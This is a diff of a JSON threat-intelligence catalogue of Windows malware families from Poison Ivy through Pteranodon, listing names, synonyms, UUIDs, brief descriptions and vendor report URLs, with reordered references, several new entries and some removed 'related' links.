@@ -36276,15 +38194,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2abe89de-46dd-4dae-ae22-b49a593aff54",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7",
"value": "Poison Ivy"
},
@@ -36306,9 +38215,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat",
+ "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf",
"https://youtu.be/DDA2uSxjVWY?t=344",
- "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf",
- "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf"
+ "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
],
"synonyms": [
"KABOB",
@@ -36337,10 +38246,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
"https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
"type": []
@@ -36361,33 +38270,47 @@
"uuid": "5ee77368-5e09-4016-ae73-82b99e830832",
"value": "Polyglot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice",
+ "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
+ "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "31017b7c-c023-4247-b37d-f15f2df5d25a",
+ "value": "PolyVice"
+ },
{
"description": "According to KnowBe4, Pony Stealer is a password stealer that can decrypt or unlock passwords for over 110 different applications including VPN, FTP, email, instant messaging, web browsers and much more. Pony Stealer is very dangerous and once it infects a PC it will turn the device into a botnet, allowing it to use the PCs it infects to infect other PCs.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pony",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://github.com/nyx0/Pony",
- "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
- "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf",
- "https://www.youtube.com/watch?v=42yldTQ-fWA",
- "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection",
- "http://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://www.knowbe4.com/pony-stealer",
"https://www.secureworks.com/research/threat-profiles/gold-essex",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.knowbe4.com/pony-stealer",
+ "https://www.uperesia.com/analysis-of-a-packed-pony-downloader",
+ "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
+ "https://github.com/nyx0/Pony",
"http://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
"https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
- "https://www.uperesia.com/analysis-of-a-packed-pony-downloader"
+ "https://www.youtube.com/watch?v=42yldTQ-fWA",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf"
],
"synonyms": [
"Fareit",
@@ -36412,17 +38335,30 @@
"uuid": "54327cbd-d30c-4684-9a66-18ae36b28399",
"value": "PoohMilk Loader"
},
+ {
+ "description": "According to Mandiant, POORTRY is a malware written as a driver, signed with a Microsoft Windows Hardware Compatibility Authenticode signature. This malware has been observed being used by UNC3944.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry",
+ "https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "17b87423-66e5-451e-8a84-5f4fd8bb2b01",
+ "value": "POORTRY"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb",
- "https://securelist.com/apt-trends-report-q2-2018/86487/",
- "https://asec.ahnlab.com/ko/18796/",
"https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "https://securelist.com/apt-trends-report-q2-2018/86487/",
"https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/"
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "https://asec.ahnlab.com/ko/18796/"
],
"synonyms": [],
"type": []
@@ -36448,6 +38384,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor",
"https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
"https://www.cybereason.com/blog/research/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf"
],
@@ -36484,24 +38421,25 @@
"value": "poscardstealer"
},
{
- "description": "",
+ "description": "PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.\r\n\r\nPoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2",
- "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets",
- "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
- "https://paper.seebug.org/1301/",
- "https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
"https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md",
"https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://github.com/nettitude/PoshC2_Python/",
- "https://redcanary.com/blog/getsystem-offsec/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://paper.seebug.org/1301/",
+ "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/",
"https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf"
+ "https://github.com/nettitude/PoshC2_Python/",
+ "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
+ "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets",
+ "https://redcanary.com/blog/getsystem-offsec/"
],
"synonyms": [],
"type": []
@@ -36514,10 +38452,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp",
- "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
"https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf",
- "https://twitter.com/just_windex/status/1162118585805758464",
- "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/"
+ "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
+ "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/",
+ "https://twitter.com/just_windex/status/1162118585805758464"
],
"synonyms": [
"PUNCHTRACK"
@@ -36532,8 +38470,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer",
- "https://www.youtube.com/watch?v=MaPXDCq-Gf4",
"https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20",
+ "https://www.youtube.com/watch?v=MaPXDCq-Gf4",
"https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/",
"https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true"
],
@@ -36550,8 +38488,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware",
- "https://youtu.be/oYLs6wuoOfg",
- "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html"
+ "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html",
+ "https://youtu.be/oYLs6wuoOfg"
],
"synonyms": [],
"type": []
@@ -36592,9 +38530,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://twitter.com/VK_Intel/status/1141540229951709184",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/"
],
"synonyms": [],
"type": []
@@ -36607,8 +38545,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
- "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
+ "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/"
],
"synonyms": [],
"type": []
@@ -36674,11 +38612,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff",
- "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
"https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
- "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/",
"https://lokalhost.pl/gozi_tree.txt",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2017"
+ "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
+ "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf"
],
"synonyms": [
"PUNCHBUGGY"
@@ -36693,28 +38631,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://content.fireeye.com/apt/rpt-apt38",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
- "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/"
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/"
],
"synonyms": [
"QUICKRIDE.POWER"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1f1be19e-d1b5-408b-90a0-03ad27cc8924",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "606f778a-8b99-4880-8da8-b923651d627b",
"value": "PowerRatankba"
},
@@ -36737,16 +38666,16 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.predator",
"https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html",
+ "https://securelist.com/a-predatory-tale/89779",
"https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
"https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/",
+ "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/",
"https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://securelist.com/a-predatory-tale/89779"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
],
"synonyms": [],
"type": []
@@ -36754,6 +38683,20 @@
"uuid": "54041c03-5714-4247-9226-3c801f59bc07",
"value": "Predator The Thief"
},
+ {
+ "description": "Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige",
+ "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
+ "https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "156b617e-2ae4-47a8-9498-6343b24cc6fe",
+ "value": "Prestige"
+ },
{
"description": "",
"meta": {
@@ -36764,15 +38707,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "67ade442-63f2-4319-bdcd-d2564b963ed6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f",
"value": "Prikormka"
},
@@ -36787,15 +38721,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "523e8772-0610-424c-bcfb-9123bcb8328f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a0899fec-161d-4ba8-9594-8b5620c21705",
"value": "Prilex"
},
@@ -36815,21 +38740,24 @@
"value": "PrincessLocker"
},
{
- "description": "",
+ "description": "According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader",
- "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
"https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
+ "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/",
+ "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html",
+ "https://www.zscaler.com/blogs/security-research/peeking-privateloader",
"https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise",
"https://www.youtube.com/watch?v=Ldp7eESQotM",
- "https://www.zscaler.com/blogs/security-research/peeking-privateloader",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html",
- "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e",
"https://intel471.com/blog/privateloader-malware",
- "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/"
+ "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign",
+ "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1"
],
"synonyms": [],
"type": []
@@ -36842,9 +38770,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog",
- "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html",
"https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
+ "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive"
],
"synonyms": [],
@@ -36872,9 +38800,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei",
"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities",
"https://twitter.com/honeymoon_ioc/status/1494016518694309896",
- "https://twitter.com/honeymoon_ioc/status/1494311182550904840"
+ "https://blog.talosintelligence.com/prometei-botnet-improves/",
+ "https://twitter.com/honeymoon_ioc/status/1494311182550904840",
+ "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities"
],
"synonyms": [],
"type": []
@@ -36887,16 +38816,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus",
- "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea",
"https://unit42.paloaltonetworks.com/prometheus-ransomware/",
+ "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd",
"https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/",
+ "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
+ "https://twitter.com/inversecos/status/1441252744258461699?s=20",
"https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
"https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
"https://www.sentinelone.com/labs/spook-ransomware-prometheus-derivative-names-those-that-pay-shames-those-that-dont/",
- "https://twitter.com/inversecos/status/1441252744258461699?s=20",
"https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html",
- "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
- "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd"
+ "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea"
],
"synonyms": [],
"type": []
@@ -36949,9 +38878,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.prynt_stealer",
- "https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed",
"https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/",
- "https://twitter.com/vxunderground/status/1519632014361640960"
+ "https://twitter.com/vxunderground/status/1519632014361640960",
+ "https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed"
],
"synonyms": [],
"type": []
@@ -36964,8 +38893,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/",
"https://asec.ahnlab.com/en/31683/",
- "https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/"
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1"
],
"synonyms": [],
"type": []
@@ -36978,14 +38910,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.psix",
- "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/",
- "https://twitter.com/mesa_matt/status/1035211747957923840",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module",
"https://twitter.com/seckle_ch/status/1169558035649433600",
- "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure"
+ "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://twitter.com/mesa_matt/status/1035211747957923840",
+ "https://blog.comodo.com/comodo-news/versions-of-psixbot/",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module"
+ ],
+ "synonyms": [
+ "PsiXBot"
],
- "synonyms": [],
"type": []
},
"uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9",
@@ -36997,7 +38932,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a",
- "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/"
+ "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/",
+ "https://twitter.com/KevinPerlow/status/1160766519615381504"
],
"synonyms": [
"ECCENTRICBANDWAGON"
@@ -37027,28 +38963,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
- "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/",
- "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine",
+ "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/",
"https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
- "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game",
+ "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/",
+ "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
+ "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/",
+ "https://cert.gov.ua/news/42",
"https://blogs.cisco.com/security/network-footprints-of-gamaredon-group",
- "https://blog.threatstop.com/russian-apt-gamaredon-group",
"https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/",
"https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/",
- "https://cert.gov.ua/news/46",
- "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021",
- "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
- "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
- "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/",
- "https://attack.mitre.org/groups/G0047",
- "https://cert.gov.ua/news/42",
- "https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
+ "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt",
+ "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine",
- "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/"
+ "https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government",
+ "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/",
+ "https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
+ "https://attack.mitre.org/groups/G0047",
+ "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
+ "https://blog.threatstop.com/russian-apt-gamaredon-group",
+ "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021",
+ "https://cert.gov.ua/news/46",
+ "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://threatmon.io/cybergun-technical-analysis-of-the-armageddons-infostealer/",
